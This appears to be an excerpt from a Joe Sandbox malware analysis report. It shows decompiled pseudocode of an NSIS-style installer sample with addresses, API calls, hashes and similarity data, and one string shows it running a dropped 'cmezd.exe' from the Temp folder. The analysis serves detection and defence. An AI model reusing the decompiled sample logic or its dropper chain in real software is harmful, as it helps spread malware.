                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                                • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                                • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                                • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p$A$C:\Users\user\AppData\Local\Temp$H7B
                                                                                              • API String ID: 2624150263-2427283371
                                                                                              • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                              • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                              • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                              • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 67%
                                                                                              			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\hardz\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}






















                                                                                              0x004021b3
                                                                                              0x004021bd
                                                                                              0x004021c7
                                                                                              0x004021d1
                                                                                              0x004021dc
                                                                                              0x004021df
                                                                                              0x004021f9
                                                                                              0x004021fc
                                                                                              0x00402202
                                                                                              0x00402205
                                                                                              0x0040220f
                                                                                              0x00402213
                                                                                              0x00402213
                                                                                              0x00402218
                                                                                              0x00402229
                                                                                              0x00402231
                                                                                              0x004022e8
                                                                                              0x004022e8
                                                                                              0x004022ef
                                                                                              0x00402237
                                                                                              0x00402237
                                                                                              0x00402246
                                                                                              0x0040224a
                                                                                              0x0040224d
                                                                                              0x00402253
                                                                                              0x00402261
                                                                                              0x00402264
                                                                                              0x00402266
                                                                                              0x00402271
                                                                                              0x00402271
                                                                                              0x00402276
                                                                                              0x00402278
                                                                                              0x0040227f
                                                                                              0x0040227f
                                                                                              0x00402282
                                                                                              0x0040228b
                                                                                              0x0040228e
                                                                                              0x00402294
                                                                                              0x00402296
                                                                                              0x004022a0
                                                                                              0x004022a0
                                                                                              0x004022a3
                                                                                              0x004022ac
                                                                                              0x004022af
                                                                                              0x004022b8
                                                                                              0x004022be
                                                                                              0x004022c0
                                                                                              0x004022ce
                                                                                              0x004022ce
                                                                                              0x004022d1
                                                                                              0x004022d7
                                                                                              0x004022d7
                                                                                              0x004022da
                                                                                              0x004022e0
                                                                                              0x004022e6
                                                                                              0x004022fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004022e6
                                                                                              0x004022f1
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                              • API String ID: 542301482-501415292
                                                                                              • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                              • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                              • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                                              • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 39%
                                                                                              			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                                              0x00402923
                                                                                              0x0040293e
                                                                                              0x00402949
                                                                                              0x0040294a
                                                                                              0x00402a94
                                                                                              0x00402925
                                                                                              0x00402928
                                                                                              0x0040292b
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.267446710.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.267441694.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267456767.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267463073.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.267507126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                              • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                              • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                                              • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                              0x00405038
                                                                                              0x00405051
                                                                                              0x00405056
                                                                                              0x0040505e
                                                                                              0x00405064
                                                                                              0x0040507a
                                                                                              0x0040507d
                                                                                              0x004052a8
                                                                                              0x004052af
                                                                                              0x004052c3
                                                                                              0x004052b1
                                                                                              0x004052b3
                                                                                              0x004052b6
                                                                                              0x004052b7
                                                                                              0x004052be
                                                                                              0x004052be
                                                                                              0x004052cf
                                                                                              0x004052dd
                                                                                              0x004052e0
                                                                                              0x004052f6
                                                                                              0x0040536b
                                                                                              0x0040536e
                                                                                              0x00405370
                                                                                              0x0040537a
                                                                                              0x00405388
                                                                                              0x00405388
                                                                                              0x0040538a
                                                                                              0x00405394
                                                                                              0x0040539a
                                                                                              0x0040539d
                                                                                              0x004053a0
                                                                                              0x004053bb
                                                                                              0x004053a2
                                                                                              0x004053ac
                                                                                              0x004053ac
                                                                                              0x004053a0
                                                                                              0x00405394
                                                                                              0x00000000
                                                                                              0x0040536e
                                                                                              0x004052fb
                                                                                              0x00405306
                                                                                              0x0040530b
                                                                                              0x00405312
                                                                                              0x00405317
                                                                                              0x0040531b
                                                                                              0x00405326
                                                                                              0x00405326
                                                                                              0x0040532a
                                                                                              0x0040532e
                                                                                              0x00405332
                                                                                              0x00405345
                                                                                              0x00405334
                                                                                              0x00405334
                                                                                              0x0040533b
                                                                                              0x00405341
                                                                                              0x0040533d
                                                                                              0x0040533d
                                                                                              0x0040533d
                                                                                              0x0040533b
                                                                                              0x00405349
                                                                                              0x0040534b
                                                                                              0x0040535e
                                                                                              0x00405361
                                                                                              0x00405364
                                                                                              0x00405364
                                                                                              0x0040532e
                                                                                              0x00000000
                                                                                              0x0040531b
                                                                                              0x004052fd
                                                                                              0x00405304
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004053be
                                                                                              0x004053be
                                                                                              0x004053c5
                                                                                              0x00405436
                                                                                              0x0040543e
                                                                                              0x00405446
                                                                                              0x00405446
                                                                                              0x0040544f
                                                                                              0x00405451
                                                                                              0x00405458
                                                                                              0x0040545b
                                                                                              0x0040545b
                                                                                              0x00405461
                                                                                              0x00405468
                                                                                              0x0040546b
                                                                                              0x0040546b
                                                                                              0x00405471
                                                                                              0x00405477
                                                                                              0x0040547d
                                                                                              0x0040547d
                                                                                              0x0040548a
                                                                                              0x004055eb
                                                                                              0x004055f2
                                                                                              0x0040560f
                                                                                              0x00405615
                                                                                              0x00405627
                                                                                              0x00405627
                                                                                              0x00000000
                                                                                              0x00405490
                                                                                              0x00405492
                                                                                              0x00405497
                                                                                              0x0040549c
                                                                                              0x004054a1
                                                                                              0x004054a3
                                                                                              0x004054a3
                                                                                              0x004054a4
                                                                                              0x004054a5
                                                                                              0x004054a7
                                                                                              0x004054a7
                                                                                              0x004054af
                                                                                              0x004054f0
                                                                                              0x004054f2
                                                                                              0x00405502
                                                                                              0x00405505
                                                                                              0x0040550a
                                                                                              0x00405511
                                                                                              0x00405514
                                                                                              0x004055b6
                                                                                              0x004055bf
                                                                                              0x004055c7
                                                                                              0x004055c7
                                                                                              0x004055d5
                                                                                              0x004055e6
                                                                                              0x004055e6
                                                                                              0x00000000
                                                                                              0x004055d5
                                                                                              0x0040551a
                                                                                              0x0040551d
                                                                                              0x00405523
                                                                                              0x00405528
                                                                                              0x0040552a
                                                                                              0x0040552c
                                                                                              0x00405532
                                                                                              0x00405539
                                                                                              0x0040553e
                                                                                              0x00405545
                                                                                              0x00405548
                                                                                              0x00405548
                                                                                              0x0040554f
                                                                                              0x0040555b
                                                                                              0x0040555f
                                                                                              0x00405561
                                                                                              0x00405561
                                                                                              0x00405551
                                                                                              0x00405553
                                                                                              0x00405553
                                                                                              0x00405581
                                                                                              0x0040558d
                                                                                              0x0040559c
                                                                                              0x0040559c
                                                                                              0x0040559e
                                                                                              0x004055a1
                                                                                              0x004055aa
                                                                                              0x00000000
                                                                                              0x004054b1
                                                                                              0x004054bc
                                                                                              0x004054bf
                                                                                              0x004054c4
                                                                                              0x004054c6
                                                                                              0x004054ca
                                                                                              0x004054da
                                                                                              0x004054e4
                                                                                              0x004054e6
                                                                                              0x004054e9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004054cc
                                                                                              0x004054cc
                                                                                              0x004054d2
                                                                                              0x004054d4
                                                                                              0x004054d4
                                                                                              0x004054d5
                                                                                              0x004054d6
                                                                                              0x00000000
                                                                                              0x004054cc
                                                                                              0x004054af
                                                                                              0x0040548a
                                                                                              0x004053cd
                                                                                              0x00000000
                                                                                              0x004053e3
                                                                                              0x004053ed
                                                                                              0x004053f2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405404
                                                                                              0x00405409
                                                                                              0x00405415
                                                                                              0x00405415
                                                                                              0x00405417
                                                                                              0x00405426
                                                                                              0x00405428
                                                                                              0x0040542c
                                                                                              0x0040542f
                                                                                              0x00000000
                                                                                              0x0040542f
                                                                                              0x004053cd
                                                                                              0x00405083
                                                                                              0x00405088
                                                                                              0x00405091
                                                                                              0x00405098
                                                                                              0x004050aa
                                                                                              0x004050b5
                                                                                              0x004050bb
                                                                                              0x004050c9
                                                                                              0x004050dd
                                                                                              0x004050e2
                                                                                              0x004050ef
                                                                                              0x004050f4
                                                                                              0x0040510a
                                                                                              0x0040511b
                                                                                              0x00405128
                                                                                              0x00405128
                                                                                              0x0040512b
                                                                                              0x00405131
                                                                                              0x00405133
                                                                                              0x00405136
                                                                                              0x0040513b
                                                                                              0x00405140
                                                                                              0x00405142
                                                                                              0x00405142
                                                                                              0x00405162
                                                                                              0x00405162
                                                                                              0x00405164
                                                                                              0x00405165
                                                                                              0x0040516a
                                                                                              0x00405170
                                                                                              0x00405174
                                                                                              0x00405179
                                                                                              0x00405181
                                                                                              0x00405185
                                                                                              0x0040518a
                                                                                              0x0040518f
                                                                                              0x00405197
                                                                                              0x0040519a
                                                                                              0x0040526a
                                                                                              0x0040527d
                                                                                              0x00000000
                                                                                              0x004051a0
                                                                                              0x004051a3
                                                                                              0x004051a6
                                                                                              0x004051a9
                                                                                              0x004051a9
                                                                                              0x004051af
                                                                                              0x004051b8
                                                                                              0x004051bb
                                                                                              0x004051bf
                                                                                              0x004051c2
                                                                                              0x004051c5
                                                                                              0x004051ce
                                                                                              0x004051d7
                                                                                              0x004051da
                                                                                              0x004051dd
                                                                                              0x004051e0
                                                                                              0x0040521e
                                                                                              0x00405249
                                                                                              0x00405220
                                                                                              0x0040522f
                                                                                              0x0040522f
                                                                                              0x004051e2
                                                                                              0x004051e5
                                                                                              0x004051f3
                                                                                              0x004051fd
                                                                                              0x00405205
